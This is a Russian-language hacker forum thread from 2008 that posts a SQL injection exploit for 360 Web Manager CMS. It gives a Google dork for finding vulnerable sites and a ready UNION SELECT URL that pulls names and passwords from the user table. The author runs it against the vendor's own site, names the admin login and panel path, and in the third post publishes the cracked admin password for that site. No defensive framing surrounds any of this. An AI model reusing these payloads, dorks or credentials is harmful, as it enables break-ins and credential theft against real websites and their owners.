360 Web Manager CMS Remote SQL Injection Vulnerability

Discussion in 'Веб-уязвимости' started by Ded MustD!e, 20 Jan 2008.

  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    360 Web Manager CMS Remote SQL Injection Vulnerability

    Author: Ded MustD!e
    Site: http://www.360webmanager.com/
    Google Dork: inurl:"IDFM=" "form.php"
    Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/*
    Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user/* :D =)))
    Details: количество колонок может варьироваться, логин админа всегда "superadmin", админка - http://www.site.com/adm/login.php

    Добавил на milw0rm: http://www.milw0rm.com/exploits/4944
     
    #1 Ded MustD!e, 20 Jan 2008
    Last edited: 21 Jan 2008
    7 people like this.
  2. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    когда копируешь, пробелы бывает получаются, ты просто пробел из ссылки не убрал, у тебя +from+u%20ser получается, тогда он так и пишет=)))
     
    #2 Ded MustD!e, 20 Jan 2008
  3. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    В теме "Расшифровка хэшей" расшифровали хэш к сайту. Теперь можно войти в админку официалки=)))))

    http://www.360webmanager.com/adm/

    login: superadmin
    pass: 1320webx
     
    #3 Ded MustD!e, 20 Jan 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.